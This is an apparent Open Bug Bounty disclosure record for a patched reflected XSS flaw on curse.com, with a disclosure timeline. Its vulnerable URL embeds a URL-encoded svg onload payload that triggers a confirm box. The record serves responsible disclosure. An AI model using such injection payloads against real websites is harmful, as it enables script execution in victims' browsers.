curse.com XSS vulnerability

2015-12-19T13:54:00
ID OBB:117558
Type openbugbounty
Reporter Lewis
Modified 2016-03-13T05:32:00

Description

Vulnerable URL:
http://www.curse.com/addons-tracker-v4.html?premium=yes&ginstalled;=2&a;%20ddons=0&cpuscore;=3.3&ramscore;=4.5&gpuscore;=1.9&gamingscore;=1&hdscore;=5%20.4&qscore;=1&cursescore;=3.2%22%3E%3Csvg/onload=confirm%28%27xssposed%27%29%3E&lastupd;=1&osbit;=32&os;=win7&gcardman;=intel%20corporation&pcmanufacturer;=dell%20computer
Details:

Description| Value
---|---
Patched:| Yes, at 12.03.2016
Latest check for patch:| 12.03.2016 14:30 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4041
Google Pagerank| 5
VIP website status:| Yes
Check curse.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 19 December, 2015 13:54 GMT
Vulnerability existence verified and confirmed| 19 December, 2015 13:56 GMT
Vulnerability details disclosed by researcher| 12 March, 2016 14:11 GMT
Vulnerability patched by the website owner| 13 March, 2016 05:32 GMT